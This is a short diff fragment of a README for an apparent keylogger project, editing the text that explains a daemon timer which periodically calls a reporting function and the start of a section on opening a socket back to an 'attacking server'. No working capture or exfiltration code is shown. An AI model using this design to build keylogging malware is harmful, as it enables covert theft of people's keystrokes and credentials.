anvu2002/Key_Logger_Socket/README.md

 timer.daemon = True
 timer.start()
 ```
 Daemon thread will be killed whenever the main thread (Keyboard) dies.
-Timer class from threading module will allow this function to call itself periodically every [interval] seconds.
+Timer class from threading module will allow the function *chat_svr_report* to call itself periodically every [interval] seconds.
 ### Network Connection
 #### Initialize s socket object to create a connection back to attacking server
 ```